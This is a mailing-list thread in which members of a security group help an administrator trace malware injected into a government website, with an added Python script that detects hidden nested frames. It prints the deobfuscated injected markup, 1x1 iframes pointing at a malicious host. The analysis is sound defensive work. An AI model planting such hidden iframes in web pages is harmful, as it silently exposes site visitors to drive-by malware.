Posted here last year ;) https://lists.owasp.org/pipermail/owasp-malaysia/2010-September/000539.html
On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor <[email protected]> wrote:
> Hi,
>
> For further action :)
>
> http://25yearsofprogramming.com/blog/20070705.htm
>
> Thanks
>
> On 9 February 2011 10:36, Rasta Boy <[email protected]> wrote:
>> Syamsuri, nice to hear that. Can you share your blog address.
>>
>> Adnan good work. Hope to learn more from you.
>>
>> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote:
>>>
>>> Mr Adnan thanks for the info and guide..
>>>
>>> I have cleaned all the mess and the site is up and running again..
>>>
>>> thanks to all too..
>>>
>>> ** I will blog this so others can make it as a guide...
>>>
>>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor
>>> <[email protected]> wrote:
>>>>
>>>> mamp <= LOL typo.. it should be nano
>>>> js <= one of the binary in Spidermonkey. get the patched version
>>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>>> working on MacOS/Darwin, apply this patch
>>>>
>>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>>
>>>> thanks
>>>>
>>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>>> <[email protected]> wrote:
>>>> > I can see 2 interesting apps/scripts:
>>>> >
>>>> > 1. mamp
>>>> > 2. /opt/analysis/js/js
>>>> >
>>>> > care to share? hopefully it is open source ;)
>>>> >
>>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>>> > <[email protected]> wrote:
>>>> >>
>>>> >> Here is my bash history:
>>>> >>
>>>> >> xanda:tmp adnan$ history
>>>> >> <snip>
>>>> >> 500 cd /tmp
>>>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php
>>>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php
>>>> >> 503 nano indexsedc.php
>>>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php
>>>> >> 505 mamp indexsedc.php.1
>>>> >> 506 nano indexsedc.php.1
>>>> >> 507 wget http://www2.pkink.gov.my/sedc.php
>>>> >> 508 nano sedc.php
>>>> >> 509 wget http://www2.pkink.gov.my/default.php
>>>> >> 510 nano default.php
>>>> >> 511 nano default.php
>>>> >> 512 clear
>>>> >> <I've remove tags and leave clean JavaScript inside>
>>>> >> 513 mv default.php default.txt
>>>> >> 514 /opt/analysis/js/js < default.txt
>>>> >> 515 cat write.log
>>>> >> 516 history
>>>> >> xanda:tmp adnan$
>>>> >>
>>>> >> Below is the output of the cat:
>>>> >> [output]
>>>> >> xanda:tmp adnan$ cat write.log
>>>> >> <iframe width="1" height="1"
>>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
>>>> >> width="1" height="1"
>>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>>>> >> [/output]
>>>> >>
>>>> >> Hint: you might use modified version of spidermonkey to 'understand'
>>>> >> the javascript
>>>> >>
>>>> >> Thanks
>>>> >>
>>>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote:
>>>> >> > thanks for the info..
>>>> >> > i will check all the file.
>>>> >> >
>>>> >> > how did you find it?
>>>> >> >
>>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>>> >> > <[email protected]> wrote:
>>>> >> >>
>>>> >> >> Here is the flow:
>>>> >> >>
>>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>>> >> >> 2) and your sedc.php has an iframe to default.php
>>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>>> >> >> actually create an iframe to
>>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>> >> >>
>>>> >> >> thanks :)
>>>> >> >>
>>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> wrote:
>>>> >> >> > can you point...
>>>> >> >> > my index.htm or indexsedc.php or other file?
>>>> >> >> >
>>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>>> >> >> > <[email protected]> wrote:
>>>> >> >> >>
>>>> >> >> >> you have iframe pointed to
>>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>> >> >> >>
>>>> >> >> >> which is not xss :)
>>>> >> >> >>
>>>> >> >> >> From my personal point of view, it's either caused by:
>>>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
>>>> >> >> >> 2) compromised server
>>>> >> >> >>
>>>> >> >> >> you can send your access.log to [email protected] or
>>>> >> >> >> [email protected] for further analysis :)
>>>> >> >> >>
>>>> >> >> >> thanks
>>>> >> >> >>
>>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> wrote:
>>>> >> >> >> > I have checked it.
>>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected]> wrote:
>>>> >> >> >> >>
>>>> >> >> >> >> Hi Mohd Syamsuri,
>>>> >> >> >> >>
>>>> >> >> >> >> Why don't you check on the reason why it's being blocked, it might help.
>>>> >> >> >> >>
>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>>> >> >> >> >>
>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>>> >> >> >> >>
>>>> >> >> >> >> Regards,
>>>> >> >> >> >> Kishur
>>>> >> >> >> >>
>>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <[email protected]> wrote:
>>>> >> >> >> >>>
>>>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>>>> >> >> >> >>> I need some advice.
>>>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>>>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4 days.
>>>> >> >> >> >>> It said that we host malware on our server Malware Detected! ( Google said that!!)
>>>> >> >> >> >>> What i did is..
>>>> >> >> >> >>> 1. Scan all the data and upload a new data
>>>> >> >> >> >>> 2. Check the index.html or index.php
>>>> >> >> >> >>> 3. Scan using web scanner using
>>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>>> >> >> >> >>> http://www.virustotal.com
>>>> >> >> >> >>> but still get blocked..
>>>> >> >> >> >>> Google said Suspected injected code
>>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent" scrolling=yes >
>>>> >> >> >> >>> I have been using this code for almost 2 years
>>>> >> >> >> >>> What should i do now?
>>>> >> >> >> >>>
>>>> >> >> >> >>> --
>>>> >> >> >> >>> best regard
>>>> >> >> >> >>> syamsuri
>>>> >> >> >> >>>
>>>> >> >> >> >>> _______________________________________________
>>>> >> >> >> >>> Owasp-Malaysia mailing list
>>>> >> >> >> >>> [email protected]
>>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >> >>>
>>>> >> >> >> >>> OWASP Malaysia Wiki
>>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>>> >> >> >> >>>
>>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
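
Added example, not part of the original thread or any poster's code: a small Python tracer for the nested-frame flow described in the thread (indexsedc.php -> sedc.php -> default.php -> off-site 1x1 iframe). The hosts, page bodies and the `trace_frames` / `fetch_constructed` names are constructed for illustration; the default.php body stands for the markup its script writes, as captured in write.log above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FrameCollector(HTMLParser):
    """Collect (src, width, height) for every <frame>/<iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag in ("frame", "iframe"):
            a = dict(attrs)
            if a.get("src"):
                self.frames.append((a["src"], a.get("width"), a.get("height")))

def is_tiny(width, height):
    """True for 0x0 or 1x1 frames, the usual shape of an injected iframe."""
    try:
        return int(width) <= 1 and int(height) <= 1
    except (TypeError, ValueError):
        return False  # missing or non-numeric size such as "100%"

def trace_frames(start_url, fetch, site_host, max_depth=5):
    """Walk nested frames; return (chain, target, reason) per off-site frame."""
    findings, seen, stack = [], set(), [(start_url, [start_url])]
    while stack:
        url, chain = stack.pop()
        if url in seen or len(chain) > max_depth:
            continue
        seen.add(url)
        collector = FrameCollector()
        collector.feed(fetch(url))
        for src, w, h in collector.frames:
            target = urljoin(url, src)
            if urlparse(target).hostname == site_host:
                stack.append((target, chain + [target]))  # same site: keep following
            else:
                reason = "off-site" + (", 1x1 hidden" if is_tiny(w, h) else "")
                findings.append((chain, target, reason))
    return findings

# Constructed sample pages (placeholder hosts), mirroring the chain in the thread.
SITE = "www2.site.example"
PAGES = {
    "http://www2.site.example/indexsedc.php": '<iframe src="sedc.php"></iframe>',
    "http://www2.site.example/sedc.php": '<iframe src="/default.php" width="100%"></iframe>',
    "http://www2.site.example/default.php":
        '<iframe width="1" height="1" src="http://injected.example/x"></iframe>',
}

def fetch_constructed(url):
    return PAGES.get(url, "")
```

In real use, `fetch` would return the saved copy of each page (or the script-emulator output for pages that build their frames in JavaScript), so nothing is rendered in a browser.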

